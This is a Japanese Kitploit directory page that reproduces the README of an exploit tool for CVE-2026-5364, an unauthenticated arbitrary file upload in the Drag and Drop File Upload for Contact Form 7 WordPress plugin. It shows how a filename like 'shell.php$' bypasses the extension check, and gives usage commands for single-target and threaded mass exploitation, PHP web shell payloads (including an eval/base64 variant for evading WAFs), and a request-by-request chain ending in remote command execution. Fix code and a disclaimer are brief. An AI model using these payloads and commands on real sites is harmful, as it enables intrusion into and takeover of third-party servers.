Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-5364 — CVE-2026-5364 は、CVSS 8.1 (High) の Unauthenticated Arbitrary File Upload 脆弱性で、Drag and Drop File Upload for Contact Form 7 におけるものです。 | Kitploit
ツール/GitHubGitHub/xxconi/cve-2026-5364
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストペイロード開発
GitHubxxconi/cve-2026-5364

CVE-2026-5364

CVE-2026-5364 は、CVSS 8.1 (High) の Unauthenticated Arbitrary File Upload 脆弱性で、Drag and Drop File Upload for Contact Form 7 におけるものです。

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-5364

CVE-2026-5364 is a CVSS 8.1 (High) Unauthenticated Arbitrary File Upload vulnerability in the Drag and Drop File Upload for Contact Form 7

CVE-2026-5364 — CF7 ドラッグ&ドロップファイルアップロード RCE

sanitize_file_name() バイパスによる認証なし任意ファイルアップロード CVSS 8.1 (High) | 影響を受ける: <= 1.1.3 | 修正済み: 1.1.4


📋 概要

フィールド値
CVE IDCVE-2026-5364
PluginDrag and Drop File Upload for Contact Form 7
Slugdrag-and-drop-file-upload-for-contact-form-7
CVSS8.1 (High)
ベクトルCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
影響を受ける<= 1.1.3
修正済み1.1.4
研究者Thomas Sanzey
公開日2026年4月23日

🔍 脆弱性概要

プラグインは、ファイル拡張子を sanitize_file_name() によるサニタイズの前に読み取ります。 攻撃者は shell.php$ という名前のファイルをアップロードします:

root@kitploit:~
pathinfo('shell.php$', PATHINFO_EXTENSION)  →  'php$'   ← ブラックリストをバイパス
sanitize_file_name('shell.php$')            →  'shell.php'  ← PHPとして保存される

3つの独立した脆弱性の連鎖:

  1. 攻撃者が制御する許可リスト — type POSTパラメータがユーザーから読み取られる
  2. サニタイズ前の拡張子チェック — pathinfo() が生のファイル名に適用される
  3. 遅延サニタイゼーション — wp_unique_filename() 内の sanitize_file_name() が $ 文字を削除する

⚙️ インストール

root@kitploit:~
git clone https://github.com/example/CVE-2026-5364
cd CVE-2026-5364
pip install requests

必要条件

  • Python 3.8+
  • requests ライブラリ
  • ターゲット: WordPress + CF7 D&D Upload <= 1.1.3 + CF7フォームがあるページ

🚀 使い方

単一ターゲット

root@kitploit:~
# 基本エクスプロイト (id コマンド)
python CVE-2026-5364.py -u https://target.com

# カスタムコマンド
python CVE-2026-5364.py -u https://target.com -c "whoami"

# インタラクティブシェル
python CVE-2026-5364.py -u https://target.com --interactive

# 異なるシェルタイプ
python CVE-2026-5364.py -u https://target.com --shell exec

# Verbose + プロキシ
python CVE-2026-5364.py -u https://target.com -v --proxy http://127.0.0.1:8080

バッチスキャン

root@kitploit:~
# 20スレッドでスキャン
python CVE-2026-5364.py -l targets.txt -t 20 -o results.txt

# 修正済みバージョンも試す
python CVE-2026-5364.py -l targets.txt --no-skip-patched -t 30

# 結果をファイルに保存
python CVE-2026-5364.py -l targets.txt -o cf7_results.txt

全パラメータ

root@kitploit:~
ターゲット:
  -u, --url URL         単一ターゲットURL
  -l, --list FILE       ターゲットリスト(1行に1URL)

エクスプロイト:
  -c, --cmd CMD         OSコマンド(デフォルト: id)
  --shell TYPE          ウェブシェルタイプ: basic|exec|pass|eval|info
  -i, --interactive     インタラクティブシェルを開く
  --no-skip-patched     修正済みバージョンも試す

スキャン:
  -t, --threads N       スレッド数(デフォルト: 10)
  --timeout S           タイムアウト(秒)(デフォルト: 15)
  --proxy URL           プロキシアドレス

出力:
  -o, --output FILE     結果ファイル
  -v, --verbose         詳細出力
  --no-color            色なし出力

🐚 ウェブシェルタイプ

タイプPayload用途
basic<?php system($_GET["cmd"]); ?>一般用途
exec<?php echo shell_exec($_GET["cmd"]); ?>完全な出力
pass<?php passthru($_GET["cmd"]); ?>バイナリ出力
eval<?php @eval(base64_decode($_POST["x"])); ?>隠蔽/WAFバイパス
info<?php phpinfo(); ?>PHP情報

🔬 技術詳細

エクスプロイトチェーン

root@kitploit:~
1. Nonce検出
   └─ wp_localize_script() により全訪問者に公開
      GET /contact/ → HTML内に "nonce":"abc123def4"

2. Shellのアップロード
   └─ POST /wp-admin/admin-ajax.php
      action=cf7_file_uploads
      nonce=abc123def4
      type=php$          ← ブラックリストにない
      file=shell.php$    ← sanitize_file_name() → shell.php

3. URL取得
   └─ Response: {"status":"ok","text":"https://target.com/wp-content/
                 uploads/cf7-uploads-custom/6831a2f4b3c12.php"}

4. RCE
   └─ GET /wp-content/uploads/cf7-uploads-custom/6831a2f4b3c12.php?cmd=id
      uid=33(www-data) gid=33(www-data) groups=33(www-data)

バイパス文字

sanitize_file_name() によって削除される文字:

root@kitploit:~
$  %  ~  `  (スペース)

このツールはすべてのバイパス文字を自動的に試行します。


🛡️ 緩和要因

要因影響
Apache .htaccess (Content-Disposition: attachment)PHPの実行を防止
Nginx / LiteSpeed.htaccess 無効 — RCE可能
ランダムなファイル名 (uniqid())AJAX応答がURLを返すため 無効
NonceCSRF保護 — 認証ではないため 無効

🩹 解決策

プラグインをバージョン 1.1.4 以降に更新してください。

root@kitploit:~
# WP-CLIで更新
wp plugin update drag-and-drop-file-upload-for-contact-form-7

コード修正 (1.1.4)

root@kitploit:~
// 間違い (1.1.3)
$file_extension = pathinfo($file['name'], PATHINFO_EXTENSION);

// 正しい (1.1.4)
$clean_name     = sanitize_file_name($file['name']);
$file_extension = pathinfo($clean_name, PATHINFO_EXTENSION);

// typeパラメータは管理者設定から読み取られるようになりました
$type = $this->get_admin_allowed_types($form_id);  // POSTからではありません

⚠️ 法的免責事項

このツールは教育および防御目的のセキュリティ研究のために開発されました。許可のないシステムでの使用は禁止されており、法的な結果を招く可能性があります。許可を得たシステムでのみ使用してください。


📄 参考文献

  • Wordfence Advisory
  • WordPress Plugin Page
  • NVD CVE-2026-5364
  • sanitize_file_name() Docs
ツールをダウンロード